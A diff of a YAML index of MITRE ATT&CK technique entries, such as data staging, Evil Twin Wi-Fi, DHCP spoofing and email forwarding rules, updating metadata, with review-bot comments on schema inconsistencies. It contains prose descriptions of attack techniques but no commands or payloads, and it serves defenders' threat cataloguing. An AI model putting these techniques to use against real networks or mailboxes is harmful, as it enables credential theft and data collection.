- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40341,23 +40800,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40427,7 +40910,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -40462,7 +40944,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40481,10 +40963,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
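Review bot: the new T1557.004 (Evil Twin) block has no `identifier: T1557.004` line before `atomic_tests: []`, whereas the neighbouring T1560.002 entry carries `identifier: T1560.002`; other entries in this file already lack the key, so the inconsistency predates this patch, but if lookup code keys on `identifier` a newly added object is the place not to extend it. Two smaller points in the same block: `x_mitre_detection: ''` is empty, and the quoted description ends with a trailing space before the closing quote (`Wi-Fi access points. "`).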
@@ -40513,7 +41074,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -40543,8 +41104,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -40598,7 +41157,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40635,7 +41193,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40663,12 +41221,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40705,23 +41261,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -40754,21 +41310,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -40876,12 +41431,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40892,13 +41446,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40912,6 +41466,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40922,12 +41477,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40972,30 +41527,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -41005,31 +41541,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
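Review bot: T1213.001 loses its `x_mitre_permissions_required: [User]` list in this hunk while other objects in the same patch keep theirs (T1114.001 and T1602.002 still carry the key), so any consumer that reads permissions for this entry needs a fallback for its absence; the accompanying `x_mitre_version` bump to 1.1 and the description change linking Testing / development credentials to Unsecured Credentials are consistent with each other and look right.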
@@ -41062,10 +41615,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41074,16 +41629,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
@@ -41115,70 +41671,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
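Review bot: `spec_version: '2.1'` is removed from both objects touched in this hunk (T1114.003 and T1074) and nothing adds it back. In STIX 2.1 `spec_version` is a required property on every object, so a consumer that validates objects individually rather than at bundle level will reject the regenerated entries; if the field is now intentionally carried only by the source bundle, state that in the description. Two real changes are otherwise buried under the wholesale key reordering of T1074 and deserve a line in the commit message: the `Mandiant M-Trends 2020` reference URL moves from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf`, and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0. A stable key order in the generator would have reduced this 70-line hunk to those few lines.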
@@ -41251,7 +41803,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -41306,12 +41857,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41323,6 +41873,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -41330,11 +41883,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41351,14 +41904,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -41374,6 +41924,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41382,13 +41933,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -41396,15 +41947,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
